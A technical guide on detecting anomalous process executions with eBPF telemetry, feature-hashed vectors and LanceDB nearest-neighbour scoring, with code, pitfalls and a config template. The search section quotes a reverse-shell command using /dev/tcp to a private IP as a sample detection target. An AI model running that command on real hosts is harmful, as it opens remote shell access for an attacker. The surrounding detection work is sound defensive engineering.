Behavioral Process Telemetry: Zero-Configuration Anomaly Detection with eBPF and Embedded Vectors

Current Situation Analysis

Traditional host security relies on a fundamental assumption: you can define what malicious behavior looks like before it happens. Tools like Falco, OSSEC, and Wazuh operationalize this by shipping thousands of signature rules or YAML policies. A typical enterprise deployment ships with roughly 5,000 preconfigured rules. The operational reality is starkly different. These rulesets consistently miss approximately 50% of environment-specific anomalies because they only detect patterns that security researchers have already documented and encoded.

This approach creates three compounding problems:

Coverage gaps for novel behavior: A developer's ad-hoc debugging script, a forgotten CI/CD artifact, or a newly introduced deployment pattern will never trigger a rule that doesn't exist.
Maintenance debt: Every new service, framework update, or infrastructure change requires manual rule tuning. False positives accumulate, leading to alert fatigue and eventual rule suppression.
Scalability friction: At fleet scale, telemetry ingestion becomes expensive. Processing 3,000 process events per hour across a modest 50-node cluster requires either local neural embedding models (adding 200MB+ of weights and 5–20ms CPU latency per event) or external API calls (introducing network dependency and per-request costs).

The industry has largely accepted this trade-off: either maintain an ever-growing ruleset, or pay for heavy ML infrastructure. What's often overlooked is that security doesn't require understanding what "bad" looks like. It only requires understanding what "normal" looks like for a specific workload. Once a behavioral baseline is established, deviation becomes the signal. This shifts the operational model from reactive signature matching to proactive anomaly detection, eliminating manual rule authoring while maintaining deterministic, low-latency scoring.

WOW Moment: Key Findings

The architectural pivot from signature matching to behavioral vectorization fundamentally changes how telemetry scales and what it catches. The following comparison isolates the operational trade-offs across three common approaches:

Approach	Setup Time	Latency/Event	Infrastructure Cost	Novel Threat Detection	Maintenance Overhead
Rule-Based (YAML/Signatures)	Days to weeks	<0.1ms	Low	Poor (known patterns only)	High (constant tuning)
Neural Embeddings (Local/API)	Hours	5–20ms (local) / 100ms+ (API)	High (GPU/CPU or API fees)	Good (semantic similarity)	Medium (model versioning)
Feature-Hashed Vectors	Minutes	<0.1ms	Near-zero (embedded)	Strong (structural deviation)	Low (auto-baselining)

Why this matters: Feature-hashed behavioral vectors eliminate the cold-start problem of rule authoring and the infrastructure drag of neural models. By converting process telemetry into fixed-dimensional vectors and measuring cosine distance against a rolling baseline, you achieve deterministic anomaly scoring with zero external dependencies. The system learns environment-specific normalcy automatically, flags structural deviations immediately, and scales linearly with fleet size without API rate limits or model weight management.

Core Solution

The implementation rests on four interconnected layers: kernel telemetry capture, deterministic vectorization, embedded storage with anomaly scoring, and semantic query routing. Each layer is designed for zero-infrastructure deployment and deterministic reproducibility.

Step 1: Kernel Telemetry Capture with eBPF and Fallback

Process execution events originate at the sys_enter_execve tracepoint. This fires before the new program image is loaded, providing a reliable interception point for command-line arguments, parent process context, and execution metadata.

Using the Aya framework in Rust, we attach a tracepoint program that extracts execution metadata and routes it to userspace through a BPF ring buffer. A single ring buffer map (available from kernel 5.8) is shared across CPUs, which preserves event ordering and avoids the per-CPU buffer bookkeeping that perf event arrays require.

// kernel/collector.rs
use aya_bpf::helpers::{bpf_get_current_comm, bpf_get_current_pid_tgid, bpf_ktime_get_ns};
use aya_bpf::macros::tracepoint;
use aya_bpf::programs::TracePointContext;

#[repr(C)]
pub struct ExecSnapshot {
    pub pid: u32,
    pub ppid: u32,
    pub uid: u32,
    pub comm: [u8; 16],
    pub cmdline: [u8; 128],
    pub timestamp_ns: u64,
}

#[tracepoint(name = "sys_enter_execve")]
pub fn capture_exec(ctx: TracePointContext) -> Result<u32, i64> {
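    let pid_tgid = bpf_get_current_pid_tgid();
    // Upper 32 bits: TGID (the PID userspace sees). Lower 32 bits: thread ID.
    let pid = (pid_tgid >> 32) as u32;
    // The parent PID is not encoded in pid_tgid. Production code must read it
    // from task_struct->real_parent->tgid; it is left as 0 in this sketch.
    let ppid: u32 = 0;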
    
    let mut snap = ExecSnapshot {
        pid,
        ppid,
        uid: 0, // populated via bpf_get_current_uid_gid in production
        comm: [0; 16],
        cmdline: [0; 128],
        timestamp_ns: unsafe { bpf_ktime_get_ns() }, // raw helper binding, hence unsafe
    };

    if let Ok(comm_bytes) = bpf_get_current_comm() {
        snap.comm = comm_bytes;
    }

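    // Read the filename pointer from the tracepoint args (omitted for brevity).
    // execve's filename and argv are user-space pointers, so production code
    // should copy them with bpf_probe_read_user_str, not the kernel variant.

    // emit_snapshot is a placeholder for the ring buffer write (not shown).
    emit_snapshot(&snap)?;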
    Ok(0)
}

The userspace agent consumes the ring buffer, batches events, and transmits them to the backend telemetry pipeline. For environments running kernels older than 5.8 or lacking BTF (BPF Type Format) support, the agent gracefully degrades to polling /proc/[pid]/cmdline and /proc/[pid]/status at fixed intervals. This fallback loses sub-millisecond timing precision and can miss processes that start and exit between polls, but it preserves behavioral telemetry continuity across heterogeneous fleets.
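As a rough illustration of the fallback path, the sketch below parses the raw contents of /proc/[pid]/status and /proc/[pid]/cmdline into a snapshot. The ProcSnapshot shape and the function names are hypothetical, and reading the files themselves (for example with Node's fs module) is left out so the parsing logic stays self-contained.

```typescript
// Hypothetical snapshot shape for the /proc fallback; field names are illustrative.
interface ProcSnapshot {
  pid: number;
  ppid: number;
  uid: number;
  comm: string;
  cmdline: string;
}

// /proc/[pid]/cmdline separates arguments with NUL bytes.
function parseCmdline(raw: string): string {
  return raw.split('\0').filter(arg => arg.length > 0).join(' ');
}

// /proc/[pid]/status is a list of "Key:\tvalue" lines.
function parseStatus(raw: string): { name: string; ppid: number; uid: number } {
  const fields: Record<string, string> = {};
  for (const line of raw.split('\n')) {
    const sep = line.indexOf(':');
    if (sep > 0) fields[line.slice(0, sep)] = line.slice(sep + 1).trim();
  }
  // "Uid:" lists real, effective, saved, and filesystem UIDs; keep the real one.
  const realUid = (fields['Uid'] ?? '0').split(/\s+/)[0];
  return {
    name: fields['Name'] ?? '',
    ppid: Number(fields['PPid'] ?? '0'),
    uid: Number(realUid),
  };
}

function buildProcSnapshot(pid: number, statusRaw: string, cmdlineRaw: string): ProcSnapshot {
  const status = parseStatus(statusRaw);
  return {
    pid,
    ppid: status.ppid,
    uid: status.uid,
    comm: status.name,
    cmdline: parseCmdline(cmdlineRaw),
  };
}
```

Unlike the eBPF path, this route yields the parent PID directly from the PPid field, at the cost of only seeing processes that are alive when the poll runs.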

Architectural rationale: eBPF provides deterministic, low-overhead kernel visibility without modifying application binaries or injecting sidecars. The /proc fallback ensures baseline coverage isn't fragmented by kernel version constraints. Batching reduces network round-trips and aligns with backend ingestion patterns.
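The batching described above could look roughly like the following. This is a minimal sketch, not the agent's actual implementation: EventBatcher is a hypothetical name, and the size and interval limits simply mirror the kind of settings an agent configuration would expose.

```typescript
// Hypothetical batching helper: flushes when the batch is full or the
// configured interval has elapsed since the last flush.
class EventBatcher<T> {
  private buffer: T[] = [];
  private lastFlush: number;
  private readonly maxBatchSize: number;
  private readonly intervalMs: number;
  private readonly send: (batch: T[]) => void;

  constructor(
    maxBatchSize: number,
    intervalMs: number,
    send: (batch: T[]) => void,
    now: number = Date.now()
  ) {
    this.maxBatchSize = maxBatchSize;
    this.intervalMs = intervalMs;
    this.send = send;
    this.lastFlush = now;
  }

  // Queue one event and flush if either limit has been reached.
  push(event: T, now: number = Date.now()): void {
    this.buffer.push(event);
    const full = this.buffer.length >= this.maxBatchSize;
    const stale = now - this.lastFlush >= this.intervalMs;
    if (full || stale) this.flush(now);
  }

  // Hand the buffered events to the sender and start a new batch.
  flush(now: number = Date.now()): void {
    if (this.buffer.length > 0) {
      this.send(this.buffer);
      this.buffer = [];
    }
    this.lastFlush = now;
  }
}
```

Because the interval is only checked when an event arrives, a real agent would also call flush from a timer so that a quiet host still delivers its last partial batch.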

Step 2: Deterministic Vectorization via Feature Hashing

Raw telemetry strings cannot be compared directly. We convert each execution snapshot into a fixed-length numerical vector using feature hashing (the hashing trick). This approach tokenizes structured fields, maps tokens to vector indices via deterministic hashing, and accumulates signed contributions.

// telemetry/vectorizer.ts
import { createHash } from 'crypto';

const VECTOR_DIM = 128;
const TOKEN_SEPARATOR = '|';

export interface TelemetrySnapshot {
  processName: string;
  parentProcess: string;
  uid: number;
  localPort?: number;
  remotePort?: number;
  commandLine: string;
}

function tokenize(input: string): string[] {
  return input
    .toLowerCase()
    .split(/[\s\/\-\.\:]+/)
    .filter(t => t.length > 0);
}

function deterministicHash(token: string, salt: number): number {
  const h = createHash('sha256')
    .update(`${token}:${salt}`)
    .digest('hex');
  return parseInt(h.slice(0, 8), 16);
}

export function buildBehavioralVector(event: TelemetrySnapshot): Float32Array {
  const vec = new Float32Array(VECTOR_DIM);
  
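  // Namespace each token by field rather than by position, so the same
  // command-line token hashes to the same index wherever it appears.
  const fields: Array<{ ns: number; token: string }> = [
    { ns: 0, token: event.processName },
    { ns: 1, token: event.parentProcess },
    { ns: 2, token: String(event.uid) },
    { ns: 3, token: String(event.localPort ?? 0) },
    { ns: 4, token: String(event.remotePort ?? 0) },
    ...tokenize(event.commandLine).map(token => ({ ns: 5, token }))
  ];

  for (const field of fields) {
    const token = field.token.trim();
    if (!token) continue;

    // Two salted hashes per token: one picks the index, one picks the sign.
    const idx = deterministicHash(token, field.ns * 2) % VECTOR_DIM;
    const sign = (deterministicHash(token, field.ns * 2 + 1) & 1) ? 1 : -1;
    vec[idx] += sign;
  }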

  // L2 normalization for stable cosine distance calculations
  let magnitude = 0;
  for (let i = 0; i < VECTOR_DIM; i++) {
    magnitude += vec[i] ** 2;
  }
  magnitude = Math.sqrt(magnitude) || 1;
  
  for (let i = 0; i < VECTOR_DIM; i++) {
    vec[i] /= magnitude;
  }

  return vec;
}

Why feature hashing over neural embeddings? Neural models like all-MiniLM-L6-v2 or text-embedding-3-small capture semantic relationships (e.g., sh and bash are both shells). However, they introduce operational friction: local inference requires 200MB+ weights and 5–20ms CPU time per event, while external APIs add network latency, per-token costs, and single points of failure. Feature hashing runs in <0.1ms, requires zero dependencies, and produces identical vectors for identical inputs. For structured telemetry where token overlap strongly correlates with behavioral similarity, hashing delivers sufficient discriminative power without infrastructure overhead. The vectorization layer is isolated behind a single interface, allowing future migration to neural embeddings without touching scoring or storage logic.

Step 3: Embedded Storage and Anomaly Scoring

We use LanceDB, an embedded vector database that operates in-process and persists data to disk. Each workload receives an isolated table. New events are vectorized, compared against the 10 nearest historical neighbors, scored via cosine distance, and appended to the baseline.

// telemetry/scorer.ts
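import { cosineSimilarity } from './math-utils';
// Assumes vectorizer.ts exports both names, and that getOrCreateWorkloadTable
// lives in a local storage module (hypothetical path).
import { buildBehavioralVector, TelemetrySnapshot } from './vectorizer';
import { getOrCreateWorkloadTable } from './storage';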

interface BaselineRow {
  vector: Float32Array;
  recordedAt: number;
}

export async function evaluateAnomaly(
  orgId: string,
  workload: string,
  event: TelemetrySnapshot
): Promise<{ score: number; isNew: boolean }> {
  const table = await getOrCreateWorkloadTable(orgId, workload);
  const vec = buildBehavioralVector(event);
  
  // Retrieve k=10 nearest historical executions
  const neighbors = await table.search(vec).limit(10).toArray();
  
  let anomalyScore = 1.0; // Maximum deviation by default
  
  if (neighbors.length > 0) {
    const distances = neighbors.map(n => 
      1 - cosineSimilarity(vec, n.vector)
    );
    const minDistance = Math.min(...distances);
    // Map to 0-1: 0 = identical to a stored execution; cosine similarity <= 0.5 saturates at 1
    anomalyScore = Math.min(1.0, minDistance * 2);
  }
  
  // Persist to baseline for future comparisons
  await table.add([{
    vector: Array.from(vec),
    recordedAt: Date.now()
  }]);
  
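  // Prune entries older than 7 days so the baseline tracks recent behavior.
  // LanceDB's delete takes a SQL-style predicate string; the mixed-case column
  // name is backtick-quoted. In production, run this on a schedule, not per event.
  const cutoff = Date.now() - 7 * 24 * 60 * 60 * 1000;
  await table.delete('`recordedAt` < ' + cutoff);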
  
  return { score: anomalyScore, isNew: anomalyScore > 0.8 };
}

The anomaly score ranges from 0 (identical to a previously observed execution) to 1 (structurally novel execution). Because it is derived from the single nearest neighbor, it measures whether a behavior has been seen before, not how often. Scores are persisted to ClickHouse alongside raw telemetry for downstream alerting, dashboarding, and forensic querying. Temporal pruning ensures the baseline adapts to legitimate infrastructure changes without accumulating stale noise.
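The scorer imports cosineSimilarity from a math-utils module that is not shown. A minimal sketch of what that helper might contain, together with the scoring rule isolated from storage, is given below. The name scoreAgainstNeighbors is hypothetical; the doubling and clamping follow the evaluateAnomaly code above.

```typescript
// Assumed contents of math-utils: cosine similarity of two equal-length vectors.
function cosineSimilarity(a: ArrayLike<number>, b: ArrayLike<number>): number {
  if (a.length !== b.length) throw new Error('dimension mismatch');
  let dot = 0;
  let normA = 0;
  let normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    normA += a[i] * a[i];
    normB += b[i] * b[i];
  }
  const denom = Math.sqrt(normA) * Math.sqrt(normB);
  // A zero vector has no direction; treat it as dissimilar to everything.
  return denom === 0 ? 0 : dot / denom;
}

// Scoring rule without the storage calls: distance to the closest neighbor,
// doubled and clamped to the 0-1 range.
function scoreAgainstNeighbors(
  vec: ArrayLike<number>,
  neighbors: ArrayLike<number>[]
): number {
  if (neighbors.length === 0) return 1.0; // empty baseline: maximally novel
  let minDistance = Infinity;
  for (const neighbor of neighbors) {
    minDistance = Math.min(minDistance, 1 - cosineSimilarity(vec, neighbor));
  }
  return Math.min(1.0, Math.max(0, minDistance * 2));
}
```

Keeping the rule in a pure function like this makes the threshold behavior easy to unit test: any event whose best match has cosine similarity of 0.5 or lower already receives the maximum score.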

Step 4: Semantic Query Interface

Once telemetry is vectorized, natural language queries become nearest-neighbor searches. The same feature hashing pipeline converts a search string into a query vector, which is then compared against workload tables.

// api/search.ts
app.post('/security/search', async (req, res) => {
  const { query, orgId, workload } = req.body;
  const queryVec = buildBehavioralVector({
    processName: query,
    parentProcess: '',
    uid: 0,
    commandLine: query
  } as TelemetrySnapshot);
  
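  // getOrCreateWorkloadTable is async, so await it before building the search
  const table = await getOrCreateWorkloadTable(orgId, workload);
  const results = await table
    .search(queryVec)
    .limit(20)
    .toArray();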
    
  res.json({ matches: results.map(r => ({
    score: 1 - cosineSimilarity(queryVec, r.vector),
    timestamp: r.recordedAt
  }))});
});

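A query like bash dev tcp will rank executions such as bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 near the top because both contain the tokens bash, dev, and tcp, which contribute to the same vector indices provided tokens are hashed independently of their position. Matching is lexical, not semantic: a descriptive query like reverse shell outbound connection shares no tokens with that command and will not retrieve it. What the hashed space adds over plain keyword search is ranked, order-insensitive partial matching, so structurally similar commands surface even when their arguments differ.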
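To make the role of token overlap concrete, here is a small self-contained sketch. It swaps the SHA-256 hash for an FNV-1a style hash purely to avoid imports, and it hashes tokens independently of position; hashTokens, tokenizeText, and dot are hypothetical names rather than part of the pipeline above.

```typescript
// FNV-1a style 32-bit hash over UTF-16 code units (stand-in for SHA-256).
function fnv1a(input: string): number {
  let hash = 0x811c9dc5;
  for (let i = 0; i < input.length; i++) {
    hash ^= input.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193);
  }
  return hash >>> 0;
}

function tokenizeText(input: string): string[] {
  return input.toLowerCase().split(/[\s\/\-\.\:]+/).filter(t => t.length > 0);
}

// Position-independent hashed bag of tokens, L2-normalized.
function hashTokens(text: string, dim: number = 128): Float32Array {
  const vec = new Float32Array(dim);
  for (const token of tokenizeText(text)) {
    const idx = fnv1a('idx:' + token) % dim;
    const sign = (fnv1a('sign:' + token) & 1) === 1 ? 1 : -1;
    vec[idx] += sign;
  }
  let norm = 0;
  for (let i = 0; i < dim; i++) norm += vec[i] * vec[i];
  norm = Math.sqrt(norm) || 1;
  for (let i = 0; i < dim; i++) vec[i] /= norm;
  return vec;
}

// Dot product; equals cosine similarity for unit vectors.
function dot(a: Float32Array, b: Float32Array): number {
  let sum = 0;
  for (let i = 0; i < a.length; i++) sum += a[i] * b[i];
  return sum;
}

const command = hashTokens('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1');
const lexicalQuery = hashTokens('bash dev tcp');
const descriptiveQuery = hashTokens('reverse shell outbound connection');

console.log('shared tokens:   ', dot(command, lexicalQuery).toFixed(2));
console.log('no shared tokens:', dot(command, descriptiveQuery).toFixed(2));
```

Barring hash collisions, the first similarity is driven entirely by the three shared tokens, while the second stays near zero. Queries therefore work best when phrased in the vocabulary of the commands themselves.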

Pitfall Guide

1. Ignoring BTF and Kernel Version Requirements

Explanation: CO-RE (Compile Once, Run Everywhere) programs rely on kernel BTF (BPF Type Format) to relocate struct accesses, so they fail to load on kernels built without it. The BPF ring buffer additionally requires kernel 5.8 or newer. Without fallback logic, a failed load on an older kernel leaves a silent telemetry gap. Fix: Before loading eBPF programs, verify that the kernel is ≥5.8 and was built with CONFIG_DEBUG_INFO_BTF=y (indicated by the presence of /sys/kernel/btf/vmlinux). Implement the /proc polling fallback and log the degradation path explicitly.
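A minimal sketch of that capability check follows. The function names are hypothetical; in a Node-based agent the release string would typically come from os.release() and hasBtf from checking whether /sys/kernel/btf/vmlinux exists, both of which are passed in here so the decision logic stays pure and testable.

```typescript
type CollectorMode = 'ebpf' | 'proc';

// Parse release strings such as "5.15.0-91-generic" into [major, minor].
function parseKernelRelease(release: string): [number, number] | null {
  const match = /^(\d+)\.(\d+)/.exec(release.trim());
  return match ? [Number(match[1]), Number(match[2])] : null;
}

// Decide which collector to run and record why, so the degradation path
// can be logged explicitly.
function selectCollectorMode(
  release: string,
  hasBtf: boolean
): { mode: CollectorMode; reason: string } {
  const version = parseKernelRelease(release);
  if (!version) {
    return { mode: 'proc', reason: 'unparseable kernel release: ' + release };
  }
  const [major, minor] = version;
  const recentEnough = major > 5 || (major === 5 && minor >= 8);
  if (!recentEnough) {
    return { mode: 'proc', reason: `kernel ${major}.${minor} is older than 5.8` };
  }
  if (!hasBtf) {
    return { mode: 'proc', reason: 'kernel BTF is not available' };
  }
  return { mode: 'ebpf', reason: `kernel ${major}.${minor} with BTF` };
}
```

Returning the reason alongside the mode means the agent can emit one log line per host that explains exactly why it fell back.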

2. Vector Space Collision from Poor Tokenization

Explanation: Aggressive tokenization or ignoring delimiters causes distinct commands to collapse into near-identical vectors. curl http://api.example.com and curl http://api.internal.local may become indistinguishable if domain boundaries aren't preserved. Fix: Use structured delimiters (/, ., :, -) that preserve semantic boundaries. Apply minimum token length filters (≥3 characters) to discard noise like a, 1, or --, but exempt short tokens that carry signal, such as sh, nc, or rm, so the filter does not hide them.
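One way to combine the delimiter set with a length filter is sketched below. The allowlist contents and the name tokenizeCommand are illustrative assumptions, not part of the original pipeline.

```typescript
// Delimiters that preserve path, host, and flag boundaries.
const DELIMITERS = /[\s\/\.\:\-=]+/;

// Hypothetical allowlist: short tokens that are too meaningful to discard.
const SHORT_TOKEN_ALLOWLIST: readonly string[] = ['sh', 'nc', 'rm', 'su'];

function tokenizeCommand(input: string, minLength: number = 3): string[] {
  return input
    .toLowerCase()
    .split(DELIMITERS)
    .filter(t => t.length >= minLength || SHORT_TOKEN_ALLOWLIST.indexOf(t) !== -1);
}

// Both hosts keep their distinguishing labels after tokenization.
console.log(tokenizeCommand('curl http://api.example.com'));
console.log(tokenizeCommand('curl http://api.internal.local'));
```

With these settings the two curl commands share curl, http, and api but differ in the remaining host labels, which is what keeps their vectors apart.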

3. Baseline Stagnation Without Temporal Decay

Explanation: Accumulating all historical events indefinitely causes the baseline to become "fossilized". Because scoring looks for the nearest neighbor anywhere in the table, any behavior that was ever observed stays normal forever: a decommissioned tool or a retired deployment path that reappears months later scores as routine. Fix: Implement sliding window pruning (e.g., 7-day retention). Weight recent events higher during scoring if your workload undergoes frequent legitimate changes.

4. Cosine Distance Misuse Without Normalization

Explanation: Cosine similarity computed as a plain dot product, and nearest-neighbor search over Euclidean distance, both assume unit vectors. Feeding unnormalized feature-hashed vectors produces skewed distances where high-magnitude vectors artificially dominate nearest-neighbor results. Fix: Always apply L2 normalization after feature hashing. Verify normalization in unit tests by asserting Math.sqrt(vec.reduce((s, v) => s + v**2, 0)) ≈ 1, allowing a norm of 0 for the rare vector whose contributions cancel out entirely.
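The normalization check can be sketched as a pair of small helpers. The names and the tolerance are assumptions; the tolerance is deliberately loose because Float32Array stores single-precision values.

```typescript
// Euclidean (L2) norm of a vector.
function l2Norm(vec: Float32Array): number {
  let sumSquares = 0;
  for (let i = 0; i < vec.length; i++) sumSquares += vec[i] * vec[i];
  return Math.sqrt(sumSquares);
}

// Return a unit-length copy; an all-zero input stays all-zero.
function l2Normalize(vec: Float32Array): Float32Array {
  const out = new Float32Array(vec.length);
  const magnitude = l2Norm(vec);
  if (magnitude === 0) return out;
  for (let i = 0; i < vec.length; i++) out[i] = vec[i] / magnitude;
  return out;
}

// Test helper: true when the vector is unit length (or entirely zero).
function isUnitOrZero(vec: Float32Array, tolerance: number = 1e-5): boolean {
  const norm = l2Norm(vec);
  return norm === 0 || Math.abs(norm - 1) <= tolerance;
}
```

A unit test can then assert isUnitOrZero on every vector the vectorizer produces for a sample of real events.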

5. Over-Indexing on Single-Event Scores

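Explanation: A single high anomaly score doesn't guarantee malicious intent. A first-run CI/CD script or a developer's ad-hoc diagnostic command will score 0.8–0.95 on initial execution yet represent legitimate behavior. Fix: Implement temporal smoothing. Require consecutive high scores or correlate with execution frequency. For example, an exponential moving average, effective_score = 0.7 * previous_score + 0.3 * score, damps a one-off spike while letting sustained novelty accumulate. Avoid a peak-hold form such as max(score, previous_score * 0.7) for this purpose: it keeps a single spike elevated across subsequent events instead of suppressing it.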
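One possible form of temporal smoothing is an exponential moving average kept per workload or per process key. The sketch below is an assumption about how that could be done, not the original implementation; ScoreSmoother and the key format are hypothetical, and the 0.7 default matches the decay factor used elsewhere in this article.

```typescript
// Exponential moving average of anomaly scores, tracked per key.
class ScoreSmoother {
  private readonly smoothed = new Map<string, number>();
  private readonly decay: number;

  constructor(decay: number = 0.7) {
    if (decay < 0 || decay >= 1) throw new Error('decay must be in [0, 1)');
    this.decay = decay;
  }

  // Blend the new raw score into the running value; unseen keys start at 0,
  // so a single spike cannot cross a high threshold on its own.
  update(key: string, score: number): number {
    const previous = this.smoothed.get(key) ?? 0;
    const next = this.decay * previous + (1 - this.decay) * score;
    this.smoothed.set(key, next);
    return next;
  }
}

const smoother = new ScoreSmoother(0.7);
console.log(smoother.update('web-frontend:curl', 0.9)); // one-off spike, heavily damped
console.log(smoother.update('web-frontend:curl', 0.9)); // repeated novelty starts to accumulate
```

With a decay of 0.7, a lone 0.9 score is damped to roughly 0.27, and only a sustained run of high scores approaches the raw value. The trade-off is detection delay, so the decay and the alert thresholds should be tuned together.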

6. Missing Fallback for Containerized Environments

Explanation: Tracepoints are kernel-wide, so a host-level eBPF program sees execve calls from every container on the node. The blind spots come from how the agent itself is deployed: an agent confined to its own PID namespace cannot resolve the host PIDs that eBPF reports, and its /proc fallback only sees the processes in its own container. Fix: Deploy the telemetry agent as a DaemonSet with hostPID: true (and hostNetwork: true if it also inspects host sockets), plus the privileges required to load eBPF programs, so that it observes container process execution from the host namespace. Validate coverage by cross-referencing with container runtime metrics.

7. Unbounded Vector Table Growth

Explanation: LanceDB tables grow linearly with event volume. Without pruning or compaction, disk I/O increases, search latency degrades, and memory pressure rises during vector scans. Fix: Enforce strict retention policies. Use LanceDB's built-in compaction for older segments. Monitor table row counts and trigger archival to cold storage (S3/GCS) when thresholds are exceeded.

Production Bundle

Action Checklist

Verify kernel version ≥5.8 and BTF support before deploying eBPF collector
Implement /proc fallback with explicit logging for legacy environments
Apply L2 normalization to all feature-hashed vectors before storage
Configure 7-day sliding window retention for baseline tables
Set initial anomaly threshold at 0.85 for production, 0.7 for dev
Cross-validate eBPF coverage against container runtime metrics
Implement temporal smoothing to prevent first-run false positives
Archive pruned baseline data to object storage for forensic retention

Decision Matrix

Scenario	Recommended Approach	Why	Cost Impact
Heterogeneous fleet (kernels 4.18–6.x)	eBPF + /proc fallback	Maintains coverage without kernel upgrades (polling may miss short-lived processes)	Low (agent handles degradation)
High-frequency workloads (>10k events/hr)	Feature hashing (128-dim)	Sub-millisecond vectorization, zero API dependency	Near-zero CPU/network
Semantic search accuracy critical	Neural embeddings (local)	Captures shell/script semantic similarity	High (GPU/CPU, 200MB+ weights)
Multi-tenant SaaS platform	LanceDB per-tenant isolation	Zero infrastructure, fast nearest-neighbor, easy backup	Low (embedded, disk-bound)
Compliance/audit requirements	ClickHouse + vector scores	Immutable storage, SQL querying, retention policies	Medium (managed ClickHouse)

Configuration Template

# telemetry-agent-config.yaml
agent:
  mode: auto  # auto, ebpf, proc
  batch_interval_ms: 60000
  max_batch_size: 500
  
ebpf:
  tracepoint: sys_enter_execve
  ring_buffer_pages: 64
  btf_required: true
  
vectorization:
  dimension: 128
  normalization: l2
  token_min_length: 3
  delimiters: [" ", "/", ".", ":", "-", "="]
  
storage:
  provider: lancedb
  retention_days: 7
  prune_interval_hours: 24
  path: /var/lib/telemetry/baselines
  
scoring:
  k_neighbors: 10
  distance_metric: cosine
  threshold_warn: 0.85
  threshold_critical: 0.95
  temporal_smoothing: true
  decay_factor: 0.7
  
backend:
  endpoint: https://telemetry.internal/v1/events
  auth_header: X-API-Key
  retry_max: 3
  timeout_ms: 5000

Quick Start Guide

Deploy the telemetry agent: Install the collector binary on target hosts. The agent auto-detects kernel capabilities and selects eBPF or /proc polling.
Initialize baseline tables: Run telemetry-agent init --org prod --workload web-frontend to create the first LanceDB table and ingest initial execution snapshots.
Configure scoring thresholds: Adjust threshold_warn and threshold_critical in the YAML config based on workload sensitivity. Production typically uses 0.85; development uses 0.7.
Validate vector coverage: Execute telemetry-agent validate --sample-size 100 to confirm L2 normalization, tokenization boundaries, and nearest-neighbor retrieval latency (<5ms).
Connect to analytics pipeline: Point the agent's backend endpoint to your ClickHouse cluster or telemetry aggregator. Query the security_events table for anomaly_score > 0.8 to surface novel executions.
